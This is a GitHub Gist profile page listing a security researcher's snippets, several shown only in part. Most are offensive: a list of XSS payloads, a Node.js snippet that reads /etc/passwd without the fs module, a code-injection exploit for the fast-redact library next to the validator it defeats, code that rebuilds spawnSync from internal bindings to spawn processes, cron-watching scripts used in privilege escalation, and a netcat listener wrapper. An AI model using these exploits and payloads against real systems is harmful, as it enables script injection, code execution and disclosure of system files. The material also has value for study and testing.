Skip to content

Instantly share code, notes, and snippets.

View phra's full-sized avatar
💻
root@localhost ~#

Francesco Soncina phra

💻
root@localhost ~#
View GitHub Profile
This file has been truncated, but you can view the full file.
#include <windows.h>
#include <iostream>
#include <msi.h>
#include <conio.h>
#include <shlobj.h>
#include <pathcch.h>
#include <shlwapi.h>
#include <tchar.h>
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "pathcch.lib")
@phra
phra / cronmonit.sh
Created June 28, 2018 16:08 — forked from padovah4ck/cronmonit.sh
ippsec process monitor script
#!/bin/bash
# Loop by line
IFS=$'\n'
old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
while true; do
new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
@phra
phra / procmon.sh
Created June 2, 2018 21:23
Detect cronjobs without reading permission
#!/bin/bash
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
new_process=$(ps -eo command)
diff <(echo "$old_process") <(echo "$new_process")
sleep 1
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
@phra
phra / read-passwd.js
Created May 29, 2018 20:11
read /etc/passwd without `fs` Node.js module
const buffer = Buffer.allocUnsafe(8192)
process.binding('fs').read(process.binding('fs').open('/etc/passwd', 0, 0600), buffer, 0, 4096)
console.log(buffer.toString())
@phra
phra / fast-redact.exploit.js
Created May 29, 2018 20:03
fast-redact exploit
const fastRedact = require('fast-redact')
const fauxRequest = {
headers: {
host: 'http://example.com',
cookie: `oh oh we don't want this exposed in logs in etc.`,
referer: `if we're cool maybe we'll even redact this`
}
}
const redact = fastRedact({
paths: ['headers.cookie', `a\n&& (function(){
@phra
phra / validator.js
Created May 29, 2018 19:45
fast-redact vulnerable validator
try {
if (/〇/.test(s)) throw Error()
const proxy = new Proxy({}, {get: () => proxy, set: () => { throw Error() }})
const expr = s.replace(/^\*/, '〇').replace(/\.\*/g, '.〇').replace(/\[\*\]/g, '[〇]')
if (/\/\*/.test(expr)) throw Error()
/* eslint-disable-next-line */
new Script(`
o.${expr}
if ([o.${expr}].length !== 1) throw Error()
`).runInNewContext({o: proxy, 〇: null})
// Source: https://github.com/nodejs/node/blob/master/lib/child_process.js
// Defines spawn_sync and normalizeSpawnArguments (without error handling). These are internal variables.
spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}
// Defines spawnSync, the function that will do the actual spawning
spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0])
@phra
phra / nca.sh
Created May 24, 2018 14:45
nca
#!/usr/bin/expect
# nca - nc wrapper by SNADO team
# Requires: expect, nc and optionally tmux
set LISTEN false
set ADDR "0.0.0.0"
set PORT 0
set TMUX false
set UDP ""
set KILL true
const GREEN = 'green'
const YELLOW = 'yellow'
const RED = 'red'
const GREEN_WEIGHT = .2
const YELLOW_WEIGHT = .3
const RED_WEIGHT = .5
const people = [
{ user: 'user1', grade: GREEN },